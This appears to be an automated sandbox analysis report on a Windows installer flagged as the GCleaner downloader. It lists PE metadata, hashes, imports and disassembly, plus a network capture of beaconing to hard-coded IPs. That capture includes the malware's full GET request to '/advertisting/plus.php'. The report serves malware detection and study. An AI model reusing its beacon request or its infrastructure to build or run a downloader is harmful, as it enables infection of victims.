Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................................................................9...........Rich............................PE..L....,?c.....................~......_.............@..........................`............@.....................................(....@.......................P..........8...............................@............................................text............................... ..`.rdata..dY.......Z..................@..@.data........ ......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.992737502830512
TrID:	Win32 Executable (generic) a (10002005/4) 98.86% Inno Setup installer (109748/4) 1.08% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	file.exe
File size:	1782938
MD5:	14e09c7a5842688842f6c0bf61c17135
SHA1:	4c9e1cbcd933293268c396b3c79f3836665059a8
SHA256:	a5ce2c21d3f92080a06e0aa7862303848b2661181b279a2db9b72b8f31a82702
SHA512:	291eba7114f626be1a02953267f4741adeb71593a75cbb8c65e74dc2783253fc94616ae73126dd2d7dd5eb273cebd6413d36a2a67fae66c1796e5b08c7344b15
SSDEEP:	49152:Zj8WUqIwpfvQvBkF9PPeaPhUMewEgjkdLCgv2MR:98WxIU+mzsv2MR
TLSH:	7885335282B1D4B9E293A77C3C33DD692ED3BA1961781024331E56CF1F277A2AC4E356
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	a2a0b496b2caca72

Static PE Info

General

Entrypoint:	0x409c18
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	1
OS Version Minor:	0
File Version Major:	1
File Version Minor:	0
Subsystem Version Major:	1
Subsystem Version Minor:	0
Import Hash:	884310b1928934402ea6fec1dbd3cf5e

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFC4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-24h], eax
call 00007EFFD44E77E3h
call 00007EFFD44E89EAh
call 00007EFFD44E8C79h
call 00007EFFD44EAC88h
call 00007EFFD44EACCFh
call 00007EFFD44ED5FEh
call 00007EFFD44ED765h
xor eax, eax
push ebp
push 0040A2D4h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 0040A29Dh
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [0040C014h]
call 00007EFFD44EE1CBh
call 00007EFFD44EDDFEh
lea edx, dword ptr [ebp-10h]
xor eax, eax
call 00007EFFD44EB2B8h
mov edx, dword ptr [ebp-10h]
mov eax, 0040CDE8h
call 00007EFFD44E788Fh
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [0040CDE8h]
mov dl, 01h
mov eax, 00407364h
call 00007EFFD44EBB47h
mov dword ptr [0040CDECh], eax
xor edx, edx
push ebp
push 0040A255h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007EFFD44EE23Bh
mov dword ptr [0040CDF4h], eax
mov eax, dword ptr [0040CDF4h]
cmp dword ptr [eax+0Ch], 01h
jne 00007EFFD44EE37Ah
mov eax, dword ptr [0040CDF4h]
mov edx, 00000028h
call 00007EFFD44EBF48h
mov edx, dword ptr [000000F4h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd000	0x950	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x11000	0x2c00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xf000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x933c	0x9400	False	0.6138883023648649	data	6.557291120606636	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0xb000	0x24c	0x400	False	0.3134765625	data	2.7679914923058866	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0xc000	0xe4c	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xd000	0x950	0xa00	False	0.414453125	data	4.430733069799036	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0xe000	0x8	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xf000	0x18	0x200	False	0.052734375	data	0.2044881574398449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x10000	0x8b4	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x11000	0x2c00	0x2c00	False	0.3243075284090909	data	4.467134664034375	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x11354	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	Dutch	Netherlands
RT_ICON	0x1147c	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	Dutch	Netherlands
RT_ICON	0x119e4	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	Dutch	Netherlands
RT_ICON	0x11ccc	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	Dutch	Netherlands
RT_STRING	0x12574	0x2f2	data
RT_STRING	0x12868	0x30c	data
RT_STRING	0x12b74	0x2ce	data
RT_STRING	0x12e44	0x68	data
RT_STRING	0x12eac	0xb4	data
RT_STRING	0x12f60	0xae	data
RT_RCDATA	0x13010	0x2c	data
RT_GROUP_ICON	0x1303c	0x3e	data	English	United States
RT_VERSION	0x1307c	0x4b8	COM executable for DOS	English	United States
RT_MANIFEST	0x13534	0x560	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll	MessageBoxA
oleaut32.dll	VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
kernel32.dll	WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
user32.dll	TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
comctl32.dll	InitCommonControls
advapi32.dll	AdjustTokenPrivileges

Possible Origin

Language of compilation system	Country where language is spoken	Map
Dutch	Netherlands
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
45.12.253.72192.168.2.380497082852925 01/25/23-10:02:04.044834	TCP	2852925	ETPRO TROJAN GCleaner Downloader - Payload Response	80	49708	45.12.253.72	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 25, 2023 10:02:03.838169098 CET	49707	80	192.168.2.3	45.12.253.56
Jan 25, 2023 10:02:03.864574909 CET	80	49707	45.12.253.56	192.168.2.3
Jan 25, 2023 10:02:03.864726067 CET	49707	80	192.168.2.3	45.12.253.56
Jan 25, 2023 10:02:03.866645098 CET	49707	80	192.168.2.3	45.12.253.56
Jan 25, 2023 10:02:03.894937992 CET	80	49707	45.12.253.56	192.168.2.3
Jan 25, 2023 10:02:03.906924009 CET	80	49707	45.12.253.56	192.168.2.3
Jan 25, 2023 10:02:03.907047033 CET	49707	80	192.168.2.3	45.12.253.56
Jan 25, 2023 10:02:03.933878899 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:03.962369919 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:03.962474108 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:03.965511084 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:03.992350101 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:03.992405891 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:03.992479086 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.017834902 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.044780970 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.044833899 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.044881105 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.044903040 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.044934034 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.044971943 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.045028925 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.045042992 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.045097113 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.045144081 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.045197964 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.045212984 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.045248032 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.045277119 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.045326948 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.045353889 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.045403004 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.045423031 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.045476913 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.045490980 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.045531988 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.072855949 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.072938919 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.072961092 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.072999001 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073029995 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073085070 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073100090 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073138952 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073163986 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073218107 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073234081 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073268890 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073296070 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073349953 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073364019 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073405027 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073425055 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073472023 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073508024 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073524952 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073553085 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073600054 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073626041 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073656082 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073683023 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073729992 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073750019 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073785067 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073812962 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073865891 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073879957 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073920012 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.073941946 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.073987961 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.074008942 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.074048042 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.074069977 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.074122906 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.074136019 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.074170113 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.100656986 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.100718021 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.100743055 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.100780964 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.100815058 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.100871086 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.100887060 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.100938082 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.100951910 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.100985050 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.101016998 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.101146936 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.101169109 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.101198912 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.101242065 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.101289034 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.101310968 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.101342916 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.101373911 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.101442099 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.101459026 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.101506948 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.101553917 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.101569891 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.101613045 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.101665020 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.101680040 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.101716042 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.101747990 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.101795912 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.101839066 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.101888895 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.101905107 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.101953030 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.101969957 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.102016926 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.102082014 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.102104902 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.102157116 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.102174997 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.102226973 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.102266073 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.102319956 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.102336884 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.102368116 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.102401018 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.102452993 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.102467060 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.102516890 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.102560997 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.102607012 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.102629900 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.102667093 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.102710962 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.102762938 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.102811098 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.102863073 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.102876902 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.102911949 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.102941036 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.102991104 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.103004932 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.103038073 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.103065014 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.103111982 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.103127956 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.103174925 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.103192091 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.103238106 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.103255987 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.103307962 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.103326082 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.103357077 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.103389978 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.103439093 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.103452921 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.103487968 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.103519917 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.103568077 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.130091906 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.130150080 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.130182028 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.130203009 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.130249977 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.130306959 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.130323887 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.130368948 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.130830050 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:04.130914927 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:04.160794973 CET	49709	80	192.168.2.3	45.12.253.75
Jan 25, 2023 10:02:04.186933994 CET	80	49709	45.12.253.75	192.168.2.3
Jan 25, 2023 10:02:04.187083960 CET	49709	80	192.168.2.3	45.12.253.75
Jan 25, 2023 10:02:04.197102070 CET	49709	80	192.168.2.3	45.12.253.75
Jan 25, 2023 10:02:04.224081993 CET	80	49709	45.12.253.75	192.168.2.3
Jan 25, 2023 10:02:04.930826902 CET	80	49709	45.12.253.75	192.168.2.3
Jan 25, 2023 10:02:04.931129932 CET	49709	80	192.168.2.3	45.12.253.75
Jan 25, 2023 10:02:06.997060061 CET	49709	80	192.168.2.3	45.12.253.75
Jan 25, 2023 10:02:07.023386002 CET	80	49709	45.12.253.75	192.168.2.3
Jan 25, 2023 10:02:07.763757944 CET	80	49709	45.12.253.75	192.168.2.3
Jan 25, 2023 10:02:07.763948917 CET	49709	80	192.168.2.3	45.12.253.75
Jan 25, 2023 10:02:08.908459902 CET	80	49707	45.12.253.56	192.168.2.3
Jan 25, 2023 10:02:08.908906937 CET	49707	80	192.168.2.3	45.12.253.56
Jan 25, 2023 10:02:09.105787039 CET	80	49708	45.12.253.72	192.168.2.3
Jan 25, 2023 10:02:09.106043100 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:09.794056892 CET	49709	80	192.168.2.3	45.12.253.75
Jan 25, 2023 10:02:09.820291996 CET	80	49709	45.12.253.75	192.168.2.3
Jan 25, 2023 10:02:10.516107082 CET	80	49709	45.12.253.75	192.168.2.3
Jan 25, 2023 10:02:10.516488075 CET	49709	80	192.168.2.3	45.12.253.75
Jan 25, 2023 10:02:12.576730967 CET	49709	80	192.168.2.3	45.12.253.75
Jan 25, 2023 10:02:12.602955103 CET	80	49709	45.12.253.75	192.168.2.3
Jan 25, 2023 10:02:13.318223000 CET	80	49709	45.12.253.75	192.168.2.3
Jan 25, 2023 10:02:13.318440914 CET	49709	80	192.168.2.3	45.12.253.75
Jan 25, 2023 10:02:15.544200897 CET	49709	80	192.168.2.3	45.12.253.75
Jan 25, 2023 10:02:15.570667982 CET	80	49709	45.12.253.75	192.168.2.3
Jan 25, 2023 10:02:16.325639963 CET	80	49709	45.12.253.75	192.168.2.3
Jan 25, 2023 10:02:16.325897932 CET	49709	80	192.168.2.3	45.12.253.75
Jan 25, 2023 10:02:18.368289948 CET	49709	80	192.168.2.3	45.12.253.75
Jan 25, 2023 10:02:18.394781113 CET	80	49709	45.12.253.75	192.168.2.3
Jan 25, 2023 10:02:19.105379105 CET	80	49709	45.12.253.75	192.168.2.3
Jan 25, 2023 10:02:19.105479956 CET	49709	80	192.168.2.3	45.12.253.75
Jan 25, 2023 10:02:21.376097918 CET	49709	80	192.168.2.3	45.12.253.75
Jan 25, 2023 10:02:21.402489901 CET	80	49709	45.12.253.75	192.168.2.3
Jan 25, 2023 10:02:22.124958992 CET	80	49709	45.12.253.75	192.168.2.3
Jan 25, 2023 10:02:22.125165939 CET	49709	80	192.168.2.3	45.12.253.75
Jan 25, 2023 10:02:24.153738976 CET	49709	80	192.168.2.3	45.12.253.75
Jan 25, 2023 10:02:24.180033922 CET	80	49709	45.12.253.75	192.168.2.3
Jan 25, 2023 10:02:24.938194036 CET	80	49709	45.12.253.75	192.168.2.3
Jan 25, 2023 10:02:24.938292027 CET	49709	80	192.168.2.3	45.12.253.75
Jan 25, 2023 10:02:26.967304945 CET	49709	80	192.168.2.3	45.12.253.75
Jan 25, 2023 10:02:26.993714094 CET	80	49709	45.12.253.75	192.168.2.3
Jan 25, 2023 10:02:27.734801054 CET	80	49709	45.12.253.75	192.168.2.3
Jan 25, 2023 10:02:27.734874964 CET	49709	80	192.168.2.3	45.12.253.75
Jan 25, 2023 10:02:29.771919966 CET	49709	80	192.168.2.3	45.12.253.75
Jan 25, 2023 10:02:29.798430920 CET	80	49709	45.12.253.75	192.168.2.3
Jan 25, 2023 10:02:30.551927090 CET	80	49709	45.12.253.75	192.168.2.3
Jan 25, 2023 10:02:30.552977085 CET	49709	80	192.168.2.3	45.12.253.75
Jan 25, 2023 10:02:32.651902914 CET	49709	80	192.168.2.3	45.12.253.75
Jan 25, 2023 10:02:32.678428888 CET	80	49709	45.12.253.75	192.168.2.3
Jan 25, 2023 10:02:33.385802031 CET	80	49709	45.12.253.75	192.168.2.3
Jan 25, 2023 10:02:33.386007071 CET	49709	80	192.168.2.3	45.12.253.75
Jan 25, 2023 10:02:36.148209095 CET	49707	80	192.168.2.3	45.12.253.56
Jan 25, 2023 10:02:36.148299932 CET	49708	80	192.168.2.3	45.12.253.72
Jan 25, 2023 10:02:36.148346901 CET	49709	80	192.168.2.3	45.12.253.75

HTTP Request Dependency Graph

45.12.253.56

45.12.253.72

45.12.253.75

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49707	45.12.253.56	80	C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 10:02:03.866645098 CET	93	OUT	GET /advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: OK Host: 45.12.253.56 Connection: Keep-Alive Cache-Control: no-cache
